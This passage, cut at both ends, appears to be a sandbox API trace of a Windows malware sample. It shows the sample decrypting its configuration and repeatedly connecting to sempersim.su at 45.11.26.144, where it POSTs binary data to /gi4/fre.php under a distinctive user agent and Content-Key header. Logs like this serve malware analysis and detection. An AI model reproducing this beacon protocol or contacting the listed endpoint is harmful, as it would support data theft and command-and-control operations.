lpSrch="/") returned 0x0 [0240.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0240.271] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0240.271] GetProcessHeap () returned 0x5b0000 [0240.271] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb1a0 [0240.271] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0240.272] GetProcessHeap () returned 0x5b0000 [0240.272] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb1a0 | out: hHeap=0x5b0000) returned 1 [0240.272] GetProcessHeap () returned 0x5b0000 [0240.272] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0240.272] GetProcessHeap () returned 0x5b0000 [0240.273] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3500 | out: hHeap=0x5b0000) returned 1 [0240.273] GetProcessHeap () returned 0x5b0000 [0240.273] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2e40 [0240.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0240.273] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0240.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0240.278] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0240.286] GetProcessHeap () returned 0x5b0000 [0240.286] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0240.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0240.287] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0240.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0240.288] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0240.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0240.289] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0240.289] GetProcessHeap () returned 0x5b0000 [0240.289] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0240.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0240.290] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2e40, pdwDataLen=0xdfcfc | out: pbData=0x5d2e40, pdwDataLen=0xdfcfc) returned 1 [0240.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0240.295] CryptDestroyKey (hKey=0x5be048) returned 1 [0240.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0240.296] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0240.296] GetProcessHeap () returned 0x5b0000 [0240.296] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0240.297] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0240.297] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0240.298] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0240.298] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0240.299] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0240.299] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0240.299] GetProcessHeap () returned 0x5b0000 [0240.299] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0240.299] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5ce038*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0240.301] GetProcessHeap () returned 0x5b0000 [0240.301] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9f0 [0240.301] socket (af=2, type=1, protocol=6) returned 0x370 [0240.301] connect (s=0x370, name=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0240.373] FreeAddrInfoW (pAddrInfo=0x5ce038*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0240.373] GetProcessHeap () returned 0x5b0000 [0240.373] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0240.375] GetProcessHeap () returned 0x5b0000 [0240.375] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0240.375] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0240.376] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0240.376] GetProcessHeap () returned 0x5b0000 [0240.376] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0240.376] GetProcessHeap () returned 0x5b0000 [0240.377] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0240.377] GetProcessHeap () returned 0x5b0000 [0240.377] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d32c0 [0240.377] GetProcessHeap () returned 0x5b0000 [0240.377] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0240.378] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0240.378] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0240.378] GetProcessHeap () returned 0x5b0000 [0240.378] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0240.378] GetProcessHeap () returned 0x5b0000 [0240.379] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0240.379] send (s=0x370, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0240.379] send (s=0x370, buf=0x5d1e18*, len=159, flags=0) returned 159 [0240.379] GetProcessHeap () returned 0x5b0000 [0240.379] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0240.379] recv (in: s=0x370, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0241.771] GetProcessHeap () returned 0x5b0000 [0241.771] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0241.771] GetProcessHeap () returned 0x5b0000 [0241.772] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0241.772] GetProcessHeap () returned 0x5b0000 [0241.772] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0241.772] GetProcessHeap () returned 0x5b0000 [0241.772] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0241.772] closesocket (s=0x370) returned 0 [0241.773] GetProcessHeap () returned 0x5b0000 [0241.773] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9f0 | out: hHeap=0x5b0000) returned 1 [0241.773] GetProcessHeap () returned 0x5b0000 [0241.773] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0241.773] GetProcessHeap () returned 0x5b0000 [0241.773] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0241.773] GetProcessHeap () returned 0x5b0000 [0241.773] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0241.774] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xb68) returned 0x370 [0241.775] Sleep (dwMilliseconds=0xea60) [0241.789] GetProcessHeap () returned 0x5b0000 [0241.789] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d31e8 [0241.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0241.790] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0241.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0241.819] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5e60) returned 1 [0241.826] GetProcessHeap () returned 0x5b0000 [0241.826] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8590 [0241.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0241.828] CryptImportKey (in: hProv=0x5c5e60, pbData=0x5c8590, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0241.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0241.828] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0241.829] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0241.829] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0241.829] GetProcessHeap () returned 0x5b0000 [0241.830] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8590 | out: hHeap=0x5b0000) returned 1 [0241.830] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0241.830] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d31e8, pdwDataLen=0xdfcfc | out: pbData=0x5d31e8, pdwDataLen=0xdfcfc) returned 1 [0241.831] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0241.831] CryptDestroyKey (hKey=0x5bde08) returned 1 [0241.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0241.832] CryptReleaseContext (hProv=0x5c5e60, dwFlags=0x0) returned 1 [0241.832] GetProcessHeap () returned 0x5b0000 [0241.832] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d4e48 [0241.833] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0241.833] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0241.834] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0241.834] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0241.834] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0241.835] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0241.835] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0241.835] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0241.836] GetProcessHeap () returned 0x5b0000 [0241.836] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0241.836] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0241.836] GetProcessHeap () returned 0x5b0000 [0241.836] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0241.836] GetProcessHeap () returned 0x5b0000 [0241.837] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d4e48 | out: hHeap=0x5b0000) returned 1 [0241.837] GetProcessHeap () returned 0x5b0000 [0241.837] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0241.837] GetProcessHeap () returned 0x5b0000 [0241.837] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d31e8 [0241.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0241.838] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0241.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0241.910] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5a20) returned 1 [0241.915] GetProcessHeap () returned 0x5b0000 [0241.915] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8620 [0241.915] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0241.916] CryptImportKey (in: hProv=0x5c5a20, pbData=0x5c8620, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0241.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0241.917] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0241.917] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0241.917] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0241.917] GetProcessHeap () returned 0x5b0000 [0241.918] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8620 | out: hHeap=0x5b0000) returned 1 [0241.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0241.919] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d31e8, pdwDataLen=0xdfcfc | out: pbData=0x5d31e8, pdwDataLen=0xdfcfc) returned 1 [0241.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0241.920] CryptDestroyKey (hKey=0x5bde08) returned 1 [0241.920] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0241.921] CryptReleaseContext (hProv=0x5c5a20, dwFlags=0x0) returned 1 [0241.921] GetProcessHeap () returned 0x5b0000 [0241.921] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5b38 [0241.966] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0241.966] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0241.967] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0241.967] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0241.968] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0241.968] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0241.968] GetProcessHeap () returned 0x5b0000 [0241.969] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0241.969] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdea8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0241.970] GetProcessHeap () returned 0x5b0000 [0241.970] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8e0 [0241.970] socket (af=2, type=1, protocol=6) returned 0x374 [0241.971] connect (s=0x374, name=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0242.042] FreeAddrInfoW (pAddrInfo=0x5cdea8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0242.042] GetProcessHeap () returned 0x5b0000 [0242.042] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5dd8 [0242.042] GetProcessHeap () returned 0x5b0000 [0242.042] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0242.044] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0242.045] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0242.045] GetProcessHeap () returned 0x5b0000 [0242.045] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0242.045] GetProcessHeap () returned 0x5b0000 [0242.045] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0242.045] GetProcessHeap () returned 0x5b0000 [0242.045] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3620 [0242.045] GetProcessHeap () returned 0x5b0000 [0242.045] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0242.046] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0242.047] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0242.047] GetProcessHeap () returned 0x5b0000 [0242.047] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0242.047] GetProcessHeap () returned 0x5b0000 [0242.048] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0242.048] send (s=0x374, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0242.048] send (s=0x374, buf=0x5d1e18*, len=159, flags=0) returned 159 [0242.048] GetProcessHeap () returned 0x5b0000 [0242.048] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0242.049] recv (in: s=0x374, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0243.758] GetProcessHeap () returned 0x5b0000 [0243.759] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0243.759] GetProcessHeap () returned 0x5b0000 [0243.759] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3620 | out: hHeap=0x5b0000) returned 1 [0243.759] GetProcessHeap () returned 0x5b0000 [0243.760] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0243.760] GetProcessHeap () returned 0x5b0000 [0243.760] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5dd8 | out: hHeap=0x5b0000) returned 1 [0243.760] closesocket (s=0x374) returned 0 [0243.761] GetProcessHeap () returned 0x5b0000 [0243.761] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8e0 | out: hHeap=0x5b0000) returned 1 [0243.761] GetProcessHeap () returned 0x5b0000 [0243.761] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5b38 | out: hHeap=0x5b0000) returned 1 [0243.761] GetProcessHeap () returned 0x5b0000 [0243.761] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0243.761] GetProcessHeap () returned 0x5b0000 [0243.762] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0243.762] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xbc0) returned 0x374 [0243.763] Sleep (dwMilliseconds=0xea60) [0243.765] GetProcessHeap () returned 0x5b0000 [0243.765] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2ff0 [0243.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0243.766] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0243.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0243.776] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0243.784] GetProcessHeap () returned 0x5b0000 [0243.784] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0243.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0243.785] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0243.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0243.785] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0243.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0243.786] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.786] GetProcessHeap () returned 0x5b0000 [0243.787] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0243.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0243.788] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2ff0, pdwDataLen=0xdfcfc | out: pbData=0x5d2ff0, pdwDataLen=0xdfcfc) returned 1 [0243.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0243.789] CryptDestroyKey (hKey=0x5be048) returned 1 [0243.789] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0243.789] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0243.789] GetProcessHeap () returned 0x5b0000 [0243.789] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5b38 [0243.790] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0243.790] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0243.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0243.791] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0243.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0243.792] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0243.793] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0243.793] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0243.793] GetProcessHeap () returned 0x5b0000 [0243.793] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb100 [0243.793] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, 